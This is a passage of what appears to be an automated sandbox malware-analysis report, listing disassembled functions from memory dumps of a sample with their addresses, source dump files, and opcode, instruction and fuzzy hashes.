                                                                                                                                                                                                                                                                • Opcode ID: d0b33e0b780e6bc19ad2319ea734a7be464a32356959ce514d380b6941fc24e1
                                                                                                                                                                                                                                                                • Instruction ID: 45592e40ae407c27731d27f265b5e2a0457c71ca2992ce7fe6627842459be930
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0b33e0b780e6bc19ad2319ea734a7be464a32356959ce514d380b6941fc24e1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4271CEB3F5162987F3540D68DCA83A27682DBA9321F2F42788F586B3C6D97E5C0953C4
                                                                                                                                                                                                                                                                Function 0049C06C Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !vh
                                                                                                                                                                                                                                                                • API String ID: 0-685513403
                                                                                                                                                                                                                                                                • Opcode ID: 2899d7b0907de3a3833356a84a1b94fbfc8c01b6d0ebfb68e0295f9f15445538
                                                                                                                                                                                                                                                                • Instruction ID: c58ab0c503d7ee47967188334c95a7fb1bdd527535afb2370371b63430244541
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2899d7b0907de3a3833356a84a1b94fbfc8c01b6d0ebfb68e0295f9f15445538
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9471A9B3F1152547F3944939CD583A266839BD5321F2F82788E5CABBC4DD3E9D0A5388
                                                                                                                                                                                                                                                                Function 0040C09E Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: N&
                                                                                                                                                                                                                                                                • API String ID: 0-3274356042
                                                                                                                                                                                                                                                                • Opcode ID: dd157610cdc960efe7df4e1a24a46d61895203be8c0bf8b0839f5c55e3392bbb
                                                                                                                                                                                                                                                                • Instruction ID: 40c1b456007b406650fd67695d09dacec3f55091d78497d5a8ecf67131062672
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd157610cdc960efe7df4e1a24a46d61895203be8c0bf8b0839f5c55e3392bbb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7651F935615B808AD729CB3A88503737BD3AF9B310F5896ADC4D7DBBC6CA3C94028B15
                                                                                                                                                                                                                                                                Function 0048836D Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: b9c3a9dae40ca90b6a8273168033b122b439d20ea6dc0102c2b5b0e16baadedd
                                                                                                                                                                                                                                                                • Instruction ID: c8eb106601d1f728ff68829f11f59719ac9177e889d22c6741f33b9c54ba3a23
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9c3a9dae40ca90b6a8273168033b122b439d20ea6dc0102c2b5b0e16baadedd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD71D373E116258BF3908D35CC583A17293EBD5321F2F42788E98AB7C5D97E6D0A6384
                                                                                                                                                                                                                                                                Function 003EF3C0 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,
                                                                                                                                                                                                                                                                • API String ID: 0-3772416878
                                                                                                                                                                                                                                                                • Opcode ID: 5a256eb1bbee9f141ed120914670034a6105b6ab2257bbadf852b9369928da05
                                                                                                                                                                                                                                                                • Instruction ID: 9c215e64708e13fab6e201c666056e02bb04dea4f4e24c8c4d44f600dfb974b5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a256eb1bbee9f141ed120914670034a6105b6ab2257bbadf852b9369928da05
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA61F83261C7E08FC7119A3988512AFBBD5ABD6324F294B3DD9E5D73D2E2788901C742
                                                                                                                                                                                                                                                                Function 0048448C Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: D^ZW
                                                                                                                                                                                                                                                                • API String ID: 0-3863700037
                                                                                                                                                                                                                                                                • Opcode ID: ba6ebd39ab55b99bee1132e1e060a060ff80f7d1b85711a5fac968cadcd16ba9
                                                                                                                                                                                                                                                                • Instruction ID: c3599207995b96c9ee44476935a39c5824f24f42228b99aab194f81ab6113cee
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba6ebd39ab55b99bee1132e1e060a060ff80f7d1b85711a5fac968cadcd16ba9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E518CB3F1262587F3444D28CC983A57653EBD5321F2F413C8A495B7C4DA3EAD0A9384
                                                                                                                                                                                                                                                                Function 004892CC Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                                                • API String ID: 0-1304234792
                                                                                                                                                                                                                                                                • Opcode ID: 581833edfeb559f28c0e06d310f69ed87e7dffe5d0875048fb0bcf125f88bb61
                                                                                                                                                                                                                                                                • Instruction ID: 0ca1bfcedcda8245050bbcedcb604b4f1697de3639bd590a2a0d0dcfc03d8608
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 581833edfeb559f28c0e06d310f69ed87e7dffe5d0875048fb0bcf125f88bb61
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61518AB3F2152547F3444839DC683A27283DBE5321F2F42788B59AB7C5E87E9D0A5284
                                                                                                                                                                                                                                                                Function 00421160 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                • Opcode ID: e0df577857cef7fc072dfa73b607eebf6e6d27571b4af1692f317b395c511588
                                                                                                                                                                                                                                                                • Instruction ID: 982f97b29e9e0a2066f08878871732148560b73d69e7cbf627f2d49353667a3f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0df577857cef7fc072dfa73b607eebf6e6d27571b4af1692f317b395c511588
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F4133B1A043209BD714CF10DC56B7BBBA1FFE5354F488A2DE5855B3A0E3399804C786
                                                                                                                                                                                                                                                                Function 0040C465 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: AB@|
                                                                                                                                                                                                                                                                • API String ID: 0-3627600888
                                                                                                                                                                                                                                                                • Opcode ID: e0051937b39084f7c8babe601806c06aed36107b249a09bb6f97a71530fee6b9
                                                                                                                                                                                                                                                                • Instruction ID: 0133377f5bab206b864b84d2ced2f9764e4a5cc7da12f32b15dcf6cb55e15be3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0051937b39084f7c8babe601806c06aed36107b249a09bb6f97a71530fee6b9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D4124715046928FD7228F39C850763BBE2BF97310B1896A9C0D29B396C738E84ACB54
                                                                                                                                                                                                                                                                Function 0049C27C Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !vh
                                                                                                                                                                                                                                                                • API String ID: 0-685513403
                                                                                                                                                                                                                                                                • Opcode ID: 2ae47abb07b14e355b9c46f1e49c484168213e958235a4c07e7c0abfdac41f0b
                                                                                                                                                                                                                                                                • Instruction ID: 7d107b8f6d21dc9d05f9904b5afe18dfe822af9d61d0329290ee4bc5960a9840
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ae47abb07b14e355b9c46f1e49c484168213e958235a4c07e7c0abfdac41f0b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E731A0B3E1162547F3984D39DD983A2768297E9321F2F42788E5C6B7C4DC3E6D095284
                                                                                                                                                                                                                                                                Function 0040E180 Relevance: .7, Instructions: 710COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 16b94b7d713b981e6d68b21f07420c297a8f08215bd313a0145d6e6ffeca8bec
                                                                                                                                                                                                                                                                • Instruction ID: ccffc028b4c86907a1b3f76927600ce6af7c6b7d75f675fd4129a533670671c8
